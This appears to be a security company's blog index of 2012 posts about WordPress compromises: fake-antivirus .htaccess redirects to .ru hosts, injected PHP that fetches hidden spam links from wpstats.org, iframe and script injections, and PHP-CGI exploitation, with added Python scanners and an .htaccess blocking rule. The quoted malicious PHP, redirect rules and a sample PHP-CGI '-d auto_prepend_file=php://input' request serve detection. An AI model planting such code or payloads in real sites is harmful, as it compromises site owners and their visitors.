Websites Compromised with Fake AV Campaign (Windows Web Secure Kit)

“To help protect your computer, Windows Web Secure Kit have detected trojans and is ready to remove them”. We are seeing many WordPress sites compromised with malware that redirects users to the “Windows Web Secure Kit” fake/rogue antivirus. So if you get that message when visiting your site (or any other), you know it has likely been compromised by it.

What is going on?

Once a site gets compromised, the .htaccess file is modified to redirect users who are running Windows and arriving from search engines to Russian sites such as:

http://colceadem.ru/infinity?8 OR
http://ademcolce.ru/infinity?8 OR
http://tradeincas.ru/siga?7 OR many others

Those then redirect the user to intermediate sites (also .ru):

Read more.
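As an added example (not code from the original post or from Sucuri), here is a small Python scanner for the pattern described above: it parses an .htaccess file, attaches each RewriteCond to the RewriteRule that follows it, and reports off-site redirects that only fire when the referer is a search engine or the user agent is a Windows browser. The sample .htaccess is constructed for this example (the redirect target is one of the hosts listed in the post); the function names, the own_hosts parameter and the keyword lists are this example's own assumptions.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: a standard WordPress .htaccess, one legitimate redirect,
# and a conditional redirect of the kind described in the post appended at the
# end. Not a copy of any real compromised file.
SAMPLE_HTACCESS = r"""
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
RewriteRule ^old-page$ http://example.com/new-page [R=301,L]
RewriteCond %{HTTP_REFERER} (google|yahoo|bing|msn|aol|ask)\. [NC,OR]
RewriteCond %{HTTP_REFERER} live\. [NC]
RewriteCond %{HTTP_USER_AGENT} windows [NC]
RewriteRule .* http://colceadem.ru/infinity?8 [R=302,L]
"""

COND_RE = re.compile(r'^\s*RewriteCond\s+(\S+)\s+(\S+)', re.I)
RULE_RE = re.compile(r'^\s*RewriteRule\s+(\S+)\s+(\S+)', re.I)

# Heuristic keyword lists (assumption of this example, extend as needed).
SEARCH_ENGINE_WORDS = ('google', 'yahoo', 'bing', 'msn', 'aol', 'ask', 'live', 'altavista')
WINDOWS_UA_WORDS = ('windows', 'msie', 'win32', 'wow64')


def find_conditional_redirects(text, own_hosts=()):
    """Return off-site redirects together with the RewriteCond lines gating them.

    In mod_rewrite every RewriteCond applies to the next RewriteRule, so the
    conditions are collected until a RewriteRule consumes them. Redirects to a
    host in own_hosts are treated as legitimate.
    """
    findings = []
    pending = []  # (line number, variable, pattern) of RewriteConds not yet consumed
    for lineno, line in enumerate(text.splitlines(), 1):
        m = COND_RE.match(line)
        if m:
            pending.append((lineno, m.group(1), m.group(2)))
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        conds, pending = pending, []
        target = m.group(2)
        if '://' not in target:
            continue  # internal rewrite ("-", /index.php, ...), not a redirect off-site
        host = (urlsplit(target).hostname or '').lower()
        if host in own_hosts:
            continue
        reasons = set()
        for _, var, pattern in conds:
            v, p = var.upper(), pattern.lower()
            if 'HTTP_REFERER' in v and any(w in p for w in SEARCH_ENGINE_WORDS):
                reasons.add('only when the visitor arrives from a search engine')
            elif 'HTTP_USER_AGENT' in v and any(w in p for w in WINDOWS_UA_WORDS):
                reasons.add('only for Windows browsers')
        findings.append({
            'line': lineno,
            'target': target,
            'host': host,
            'conditions': [f'{var} {pattern}' for _, var, pattern in conds],
            'reasons': sorted(reasons),
        })
    return findings


if __name__ == '__main__':
    for f in find_conditional_redirects(SAMPLE_HTACCESS, own_hosts=('example.com',)):
        print(f"line {f['line']}: redirect to {f['host']} {', '.join(f['reasons'])}")
        for c in f['conditions']:
            print('   ', c)
```

The conditions matter more than the target: a redirect that only applies to search-engine traffic is invisible to the site owner (who types the URL directly) and to a scanner that fetches the page without a referer, which is exactly why this pattern survives so long. Run the scanner with your own hostnames in own_hosts, and fetch the site with a Google referer and a Windows user agent when you investigate.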


Posted in fakeav, htaccess, malware, malware_updates, wordpress

Official WordPress Plugin Directory – Forcing Plugin Updates

For a while we have wondered what happens when a plugin is removed from the official WordPress plugin directory for security reasons. Historically, we haven't seen much of anything happen: no notification to users, no official blog post, nothing beyond the plugin disappearing from the repo. Sometimes when it did disappear, my understanding is that updates were forced, certainly for the major vulnerabilities.

In an interesting move, it looks like some experimental changes have been made to help ensure users quickly learn there is a security problem.
Read more.


Posted in community, plugin, security, sucuri, updates, vulnerability, wordpress

Blog Comments – Analysing 100,000 Comments and Spammers

“Nice blog, thanks for the info”

“Awesome site. Great job”

“You should take part in a contest for one of the best blogs on the web. I will recommend this site!”


I know you like flattering comments on your website. And I know you love to see many comments on each of your posts (call it community participation). Who doesn't, right? We love them too.

So we decided to take a closer look at the last 100,000 (well, 98,238 to be exact) comments that were sent to the network of sites we monitor. How many of them are spam? Who are the most annoying spammers? And things like that.

Read more.


Posted in comment, data, spam, webinar

Wpstats.org Spam and a Fake Advanced Search Plugin

If you are seeing hidden links on your WordPress site, they could be coming from wpstats.org. In some blackhat spam cases we are analysing, the following code was added to the theme header of the compromised site:

if (function_exists('curl_init')) {
    $url = "http://www.wpstats.org/jquery-1.6.3.min.js";   // fetched server-side, never sent to the browser as a script
    $ch = curl_init();
    $timeout = 5;
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);           // return the response body instead of printing it
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    $data = curl_exec($ch);
    curl_close($ch);
    echo "$data";                                          // whatever wpstats.org returned lands in the page HTML
}

If you are not familiar with PHP, this code contacts www.wpstats.org/jquery-1.6.3.min.js and echoes the response straight into the page. Despite the file name, nothing is loaded as a script in the browser: the server fetches the remote content and the response is a long list of hidden links that end up embedded in your site (not visible in a normal browser).
Read more.
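As an added example (not code from the original post or from Sucuri), the following Python script looks for the tell-tale of this injection in PHP theme files: the result of a server-side fetch (curl_exec, file_get_contents and friends) being echoed into the page, together with any remote URLs involved, including ones hidden inside base64_decode() literals. The three PHP samples are constructed for this example; the malicious one is the snippet quoted above with its quotes normalised, and the obfuscated variant is an assumption about how the same payload is commonly disguised, not something taken from the post.

```python
import base64
import re

# Constructed samples. MALICIOUS_HEADER is the snippet quoted in the post.
MALICIOUS_HEADER = r'''<?php
if(function_exists('curl_init')) { $url = "http://www.wpstats.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data"; }
?>'''

# What a theme header legitimately does with jQuery: enqueue it, never fetch it server-side.
BENIGN_HEADER = r'''<?php
wp_enqueue_script('jquery');
$data = get_bloginfo('name');
echo $data;
?>'''

# Assumed obfuscated variant: same URL, hidden in a base64 literal. The blob is
# built with b64encode here so the sample is self-consistent.
OBFUSCATED_HEADER = (
    '<?php $u = base64_decode("'
    + base64.b64encode(b'http://www.wpstats.org/jquery-1.6.3.min.js').decode()
    + '"); $data = file_get_contents($u); print $data; ?>'
)

# $var = <remote fetch>(...)
FETCH_RE = re.compile(
    r'\$(\w+)\s*=\s*@?(curl_exec|file_get_contents|stream_get_contents|fread|fgets)\s*\(', re.I)
# echo $var / print $var / echo "$var" / print($var)
OUTPUT_RE = re.compile(r'\b(?:echo|print)\b\s*\(?\s*["\']?\s*\$(\w+)', re.I)
URL_RE = re.compile(r'https?://[^\s"\'<>)]+', re.I)
B64_RE = re.compile(r'base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')


def extract_urls(source):
    """URLs in the source, including ones hidden inside base64_decode('...') literals."""
    urls = set(URL_RE.findall(source))
    for blob in B64_RE.findall(source):
        try:
            decoded = base64.b64decode(blob, validate=True).decode('utf-8', 'replace')
        except ValueError:
            continue
        urls.update(URL_RE.findall(decoded))
    return sorted(urls)


def scan_php(source):
    """Report variables that hold a server-side fetch result and are later echoed."""
    fetched = {m.group(1): m.group(2).lower() for m in FETCH_RE.finditer(source)}
    printed = {m.group(1) for m in OUTPUT_RE.finditer(source)}
    findings = []
    for var, func in fetched.items():
        if var in printed:
            urls = extract_urls(source)
            findings.append({
                'variable': var,
                'fetch': func,
                'urls': urls,
                # a ".js" URL fetched by the server is a strong tell: real scripts are
                # referenced from <script src>, not downloaded and inlined by PHP
                'js_fetched_server_side': [u for u in urls if u.lower().endswith('.js')],
            })
    return findings


if __name__ == '__main__':
    for name, src in (('benign', BENIGN_HEADER), ('malicious', MALICIOUS_HEADER),
                      ('obfuscated', OBFUSCATED_HEADER)):
        print(name, scan_php(src))
```

Run it over wp-content/themes/*/header.php and footer.php first, since that is where this campaign places the code; a hit is worth reviewing by hand because the same fetch-and-echo shape is also used by legitimate (if ill-advised) widgets.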


Posted in hacked, malware, malware_updates, pharma, spam

Sucuri WordPress Security Plugin Protects Against PHP-CGI Vulnerability

Today we released an update on the latest PHP-CGI vulnerability and provided some additional information that users can use to help protect against it.

Guidance includes updating your .htaccess file with the following:

RewriteEngine on
RewriteCond %{QUERY_STRING} ^[^=]*$
RewriteCond %{QUERY_STRING} %2d|\- [NC]
RewriteRule .? - [F,L]

It is important to note, however, that if you are on WordPress and currently using our free security plugin, you are protected. We are actively seeing the attack across our growing network of plugin users and are proactively pushing changes to protect them. Read more.


Posted in awareness, plugin, protection, security, sucuri, wordpress

PHP-CGI Vulnerability Exploited in the Wild

When the PHP-CGI vulnerability was disclosed, we knew it would be just a matter of days before it started to be exploited in the wild.

Well, it didn't take long. Since the weekend we have been seeing scanners looking for that vulnerability on our servers and honeypots, and now we are seeing sites compromised through it as well.

Understanding the Attack

So far we have noticed that the attack starts in one of two ways, either by checking whether the server is vulnerable using the ?-s option (which shows the source of the page):
Read more.
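As an added example (not code from the original posts or from Sucuri), here is a Python detector that applies the same test as the two RewriteCond lines from the previous post to Apache access-log lines: a query string with no literal "=" (which CGI hands to php-cgi as command-line arguments) that contains a dash, raw or encoded as %2d. It then decodes the query the way php-cgi would see it and names the switches, so the ?-s source-disclosure probe described above is distinguished from a -d php.ini override. The log lines are constructed for this example (RFC 5737 test addresses); the function names and the option table are this example's own.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-log lines: a ?-s source-disclosure probe, a follow-up
# -d override, a normal WordPress request, and a probe with the dash URL-encoded.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [07/May/2012:10:11:12 +0000] "GET /index.php?-s HTTP/1.1" 200 4412 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [07/May/2012:10:11:14 +0000] "POST /index.php?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 137 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [07/May/2012:10:12:01 +0000] "GET /?p=42 HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [07/May/2012:10:12:05 +0000] "GET /wp-login.php?%2Ds HTTP/1.1" 403 211 "-" "-"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# What the php-cgi switches mean once they reach argv.
OPTION_MEANING = {
    '-s': 'display the script source (disclosure)',
    '-d': 'override a php.ini directive (allow_url_include / auto_prepend_file lead to code execution)',
    '-n': 'ignore php.ini',
    '-c': 'use an alternative php.ini path',
    '-i': 'dump phpinfo()',
}


def query_is_cgi_argv(query):
    """Mirror of the two RewriteCond lines: no literal '=' in the raw query string
    (so the CGI layer passes it to php-cgi as arguments) and a dash, raw or %2d."""
    if '=' in query:
        return False
    return '-' in query or '%2d' in query.lower()


def php_cgi_options(query):
    """Decode the query as php-cgi would see it ('+' separates words) and pull out switches."""
    decoded = unquote(query.replace('+', ' '))
    return re.findall(r'(?<!\S)-[A-Za-z]', decoded)


def scan_access_log(lines):
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, sep, query = m.group('target').partition('?')
        if not sep or not query_is_cgi_argv(query):
            continue
        opts = php_cgi_options(query)
        hits.append({
            'ip': m.group('ip'),
            'path': path,
            'query': query,
            'status': int(m.group('status')),
            'options': opts,
            'meaning': [OPTION_MEANING.get(o, 'unknown php-cgi switch') for o in opts],
        })
    return hits


if __name__ == '__main__':
    for h in scan_access_log(SAMPLE_LOG_LINES):
        print(h['ip'], h['status'], h['path'] + '?' + h['query'], h['options'])
```

Two things the sample makes visible. First, the -d payload encodes its "=" as %3d, so it still has no literal "=" and is still passed as argv; that is why the rule (and this check) looks at the raw query string rather than a decoded one. Second, the rule is coarse: any "="-less query containing a dash is refused, so a legitimate URL such as /?some-slug gets a 403 too. Treat the .htaccess rule as a stopgap and upgrade PHP to a fixed release.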


Posted in malware, malware_updates, vulnerability

April/2012 Malware Analysis

When we see a compromised site distributing malware, it is usually done via one of four methods: iframe, JavaScript, spam or internal redirections. Those are not the only ways, and they can be encoded or hidden in different ways inside the site, but the final output on the compromised site is generally one of these:

  1. Iframe injection: makes the browser load content from external (and malicious) web sites. Example: <iframe src="http://pokosa.com/tds/go.php?sid=1" ..
  2. JavaScript injection: used to encode (hide) calls to iframes or additional remote JavaScript includes. Example: <script>d= Date ;d=new d();h=-parseInt("012")/5;if(window.document)try{new document.getElementById("qwe")…. (this code redirects users to the Blackhole exploit kit)
  3. .htaccess (or conditional) redirections: used to redirect anyone visiting the site from search engines (or with specific user agents/referers) to malware or spam content.
  4. Blackhat SEO spam: not really malware in the strict sense (it won't infect anyone visiting the site), but still harmful to the webmaster and the site's reputation (imagine a corporate site redirecting to an online Viagra store).

April / 2012 stats

Read more.


Posted in data, malware, malware_updates, sucuri

New WooThemes Vulnerability Patched – Update Framework Now!

Yesterday a vulnerability in the WooThemes Framework was disclosed by Jason Gill in a GitHub gist. The vulnerability allows a visitor to see and run the output of any shortcode configured on the WordPress site.

At this time this does not appear to be linked to the DDoS they experienced this week.

We are currently assessing the severity of this vulnerability in our labs. If we find that something severely adverse can be done with it, the next big concern will be that it can be exploited even if the theme is not active. Read more.


Posted in awareness, community, sucuri, vulnerability

Ransomware Malware on the Web?

As the week comes to a close I wanted to take a minute to talk about something we haven't covered yet: ransomware.

The idea came from a case this week where a client was defaced. Instead of engaging the host or a malware professional, she took it upon herself to plead with the attacker via the email address he had left (you have to love egos). What was most amusing was that the attacker finally gave in and restored her site in an attempt to get her off his back.

Obviously not something we recommend, but an amusing story nonetheless. She turned his defacement around and retaliated with a little something we like to call “Begware.”

And so this got us thinking about something that has predominantly been confined to notebook and desktop environments: ransomware. Read more.


Posted in awareness, community, malware, security, sucuri

Lockdown WordPress – A Security Webinar with Dre Armeda

We had the opportunity to do a webinar about WordPress security with the guys from iThemes yesterday. Here’s the video for those of you who missed out on the fun:

Dre Armeda from Sucuri Security presented on various WordPress-related areas that help reduce risk for website owners and administrators. The webinar includes a high-level discussion about the growth of the internet, goes over some of the more popular malware attacks affecting WordPress users, then offers various tips, tools and resources to help you reduce risk.

Hope you enjoy!


If you have any questions, feel free to email us at info@sucuri.net


Posted in awareness, education, sucuri, webinar, wordpress